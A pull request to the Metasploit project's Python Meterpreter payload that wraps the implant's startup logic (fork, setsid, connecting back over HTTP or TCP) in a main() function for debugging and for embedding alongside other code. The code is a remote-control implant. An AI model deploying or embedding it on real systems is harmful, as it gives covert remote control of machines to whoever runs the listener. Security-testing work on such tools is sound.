### PR TITLE
wrap main to make meterpreter easier to wrap in a debugger

### DIFF
--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -1264,19 +1264,24 @@ class PythonMeterpreter(object):
         resp += tlv_pack(reqid_tlv)
         return tlv_pack_response(result, resp)
 
-_try_to_fork = TRY_TO_FORK and hasattr(os, 'fork')
-if not _try_to_fork or (_try_to_fork and os.fork() == 0):
-    if hasattr(os, 'setsid'):
-        try:
-            os.setsid()
-        except OSError:
-            pass
-    if HTTP_CONNECTION_URL and has_urllib:
-        transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT,
-                http_host=HTTP_HOST, http_referer=HTTP_REFERER, http_cookie=HTTP_COOKIE)
-    else:
-        # PATCH-SETUP-STAGELESS-TCP-SOCKET #
-        transport = TcpTransport.from_socket(s)
-    met = PythonMeterpreter(transport)
-    # PATCH-SETUP-TRANSPORTS #
-    met.run()
+
+def main():
+    _try_to_fork = TRY_TO_FORK and hasattr(os, 'fork')
+    if not _try_to_fork or (_try_to_fork and os.fork() == 0):
+        if hasattr(os, 'setsid'):
+            try:
+                os.setsid()
+            except OSError:
+                pass
+        if HTTP_CONNECTION_URL and has_urllib:
+            transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT,
+                    http_host=HTTP_HOST, http_referer=HTTP_REFERER, http_cookie=HTTP_COOKIE)
+        else:
+            # PATCH-SETUP-STAGELESS-TCP-SOCKET #
+            transport = TcpTransport.from_socket(s)
+        met = PythonMeterpreter(transport)
+        # PATCH-SETUP-TRANSPORTS #
+        met.run()
+
+if __name__ == "__main__":
+    main()


### PR DESCRIPTION
Requires https://github.com/rapid7/metasploit-framework/pull/9774 is already merged.

This wraps meterpreter's main execution into a callable method to make it easier to wrap with a debugger and also easier to embed in as library/module file delivered with other code if not wrapped as a lambda.

This requires an update to metasploit-framework to format the replaced lines correctly.